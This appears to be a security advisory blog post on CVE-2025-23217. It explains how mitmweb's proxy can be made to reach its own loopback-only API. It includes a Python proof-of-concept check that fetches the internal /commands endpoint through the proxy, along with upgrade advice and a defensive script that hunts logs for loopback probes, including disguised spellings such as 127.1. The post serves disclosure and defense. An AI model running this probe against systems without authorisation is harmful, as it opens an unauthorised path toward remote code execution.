Description: In this post, we discuss the recently disclosed vulnerability in mitmweb versions 11.1.1 and below. mitmweb is the web-based interface of the popular mitmproxy suite. The flaw allows an attacker who can reach mitmweb's proxy port to access mitmweb's internal API (which is bound to loopback only), and from there potentially escalate to remote code execution. Make sure to update your mitmweb instances to version 11.1.2 or later to close this issue.

Introduction

mitmproxy is an interactive, TLS-capable intercepting HTTP proxy primarily used by penetration testers and software developers for debugging and security assessments. mitmweb is a web-based interface for mitmproxy that enables users to interact with the proxy through a convenient graphical interface. This vulnerability affects only mitmweb, not the mitmproxy or mitmdump tools.

Vulnerability Details (CVE-2025-23217)

In mitmweb 11.1.1 and below, a malicious client can use mitmweb's proxy server (which is bound to *:8080 by default) to access mitmweb's internal API (bound to 127.0.0.1:8081 by default). The loopback binding is what normally keeps the API off the network: an attacker cannot connect to 127.0.0.1:8081 directly. They can, however, ask the proxy to fetch http://127.0.0.1:8081/... on their behalf, and the proxy forwards the request to its own host, where the API accepts it. This is a server-side request forgery (SSRF) against the proxy's own management interface, and because the API exposes mitmweb's commands and options, it may allow the attacker to escalate from a network position to remote code execution (RCE).

The following code snippet demonstrates a check for the vulnerability against a mitmweb instance. Note that the request must go through the proxy (the proxies= parameter below), not to a path on the proxy's own listener:

import requests

# Change this to the host and proxy port of the mitmweb instance under test
# (the proxy listens on *:8080 by default)
proxy = "http://192.168.1.2:8080"

# The web API is bound to 127.0.0.1:8081 by default and is unreachable from the
# network, but the proxy will forward a request addressed to its own loopback
api_url = "http://127.0.0.1:8081/commands"

try:
    # This test call shows that we can reach the internal API through the proxy
    ssrf_call = requests.get(api_url, proxies={"http": proxy}, timeout=5)
except requests.RequestException as exc:
    print(f"Could not reach the proxy: {exc}")
    raise SystemExit(1)

if ssrf_call.status_code == 200:
    print("The target is vulnerable! Internal API accessed via SSRF:")
    print(ssrf_call.text)
else:
    print(f"The target is not vulnerable or not reachable (HTTP {ssrf_call.status_code}).")

Please note that this code is provided for educational purposes only. Unauthorized testing or exploiting others' systems is illegal and unethical.

The vulnerability has been assigned the identifier CVE-2025-23217 and is fixed in mitmweb version 11.1.2 and later.

Mitigation

To mitigate this vulnerability, users should upgrade their mitmweb instances to version 11.1.2 or later following the official installation documentation at https://docs.mitmproxy.org/stable/overview-installation/ (mitmweb --version shows the installed version). It is also recommended to review your proxy logs for requests that were addressed to the web interface's loopback address and port, which is the indicator of compromise (IoC) for this issue, and to avoid exposing the proxy port (8080 by default) to untrusted networks.
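As an added example (not part of the original post or of the mitmproxy project), the following Python script hunts for that indicator: requests that arrived at the proxy but were addressed to the web interface's loopback address on the web port. The log layout and the sample lines are constructed for this example and are an assumption; adapt the regular expression to whatever your deployment actually records (mitmproxy flow dumps, a front reverse proxy's access log). It goes a little beyond the post by canonicalising shorthand loopback spellings such as 127.1 and [::1], which a naive search for the string 127.0.0.1 would miss.

```python
import ipaddress
import re
import socket
from urllib.parse import urlsplit

# Constructed sample in a mitmdump-style event-log layout (the exact format is an
# assumption for this example; real layouts differ between versions). Each line
# records the proxy client and the absolute URL it asked the proxy to fetch.
SAMPLE_LOG = """\
[14:02:11.103][192.168.1.50:53412] GET https://example.com/api/v1/items
[14:02:12.870][192.168.1.50:53414] GET http://127.0.0.1:8081/commands
[14:02:13.004][192.168.1.50:53414] POST http://localhost:8081/options
[14:02:13.522][192.168.1.77:60120] GET http://10.0.0.5:8081/health
[14:02:14.010][192.168.1.50:53416] GET http://127.1:8081/flows
[14:02:15.333][192.168.1.50:53417] GET http://[::1]:8081/state
"""

LOG_LINE = re.compile(
    r"^\[(?P<ts>[^\]]+)\]\[(?P<client>[^\]]+)\]\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)"
)


def canonical_host(host: str) -> str:
    """Normalise hostnames an attacker might use to disguise the loopback target.

    socket.inet_aton accepts the same shorthand the C resolver does ("127.1",
    "0x7f000001", "2130706433"), so matching on the string "127.0.0.1" alone
    misses them; canonicalising first closes that gap.
    """
    host = host.lower()
    if host == "localhost":
        return "127.0.0.1"
    try:
        return socket.inet_ntoa(socket.inet_aton(host))
    except OSError:
        return host  # IPv6 literal or a DNS name, handled by the caller


def targets_web_api(url: str, web_port: int = 8081, extra_hosts=()) -> bool:
    """True if a proxied request is aimed at the mitmweb web interface.

    By default the web UI/API listens on 127.0.0.1:8081, so a request arriving
    through the proxy for a loopback address on that port is the SSRF pattern
    from CVE-2025-23217. Pass extra_hosts if web_host was changed from the default.
    """
    parts = urlsplit(url)
    host = parts.hostname
    if host is None:
        return False
    port = parts.port if parts.port is not None else (443 if parts.scheme == "https" else 80)
    if port != web_port:
        return False
    host = canonical_host(host)
    if host in extra_hosts:
        return True
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:
        return False  # a DNS name; cannot be resolved offline, so not flagged here


def find_api_probes(log_text: str, web_port: int = 8081, extra_hosts=()) -> list[dict]:
    """Return one record per log line showing the proxy being used to reach the web API."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        if targets_web_api(m["url"], web_port, extra_hosts):
            hits.append({"client": m["client"], "method": m["method"], "url": m["url"]})
    return hits


def clients_by_probe_count(hits: list[dict]) -> dict[str, int]:
    """Aggregate hits by client IP (source port stripped) so repeat offenders stand out."""
    counts: dict[str, int] = {}
    for h in hits:
        ip = h["client"].rsplit(":", 1)[0]
        counts[ip] = counts.get(ip, 0) + 1
    return counts


if __name__ == "__main__":
    probes = find_api_probes(SAMPLE_LOG)
    for p in probes:
        print(f"{p['client']} -> {p['method']} {p['url']}")
    print(clients_by_probe_count(probes))
```

On the sample above the script flags the four loopback requests to port 8081 and attributes all of them to 192.168.1.50, while leaving the ordinary browsing request and the request to 10.0.0.5 alone; if you bound the web interface to a non-loopback address, pass that address in extra_hosts so requests to it are flagged as well.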

Unfortunately, there are no known workarounds for this vulnerability, making a prompt upgrade essential for securing your system.

Conclusion

This vulnerability highlights the importance of keeping your software up-to-date and reviewing the security configurations of your systems. By regularly updating your mitmweb instances and applying security best practices, you can help protect your systems from exploitation.

Original References

- mitmproxy GitHub Repository
- mitmweb Documentation
- mitmproxy 11.1.2 Release Notes
- CVE-2025-23217

Timeline

Published on: 02/06/2025 18:15:32 UTC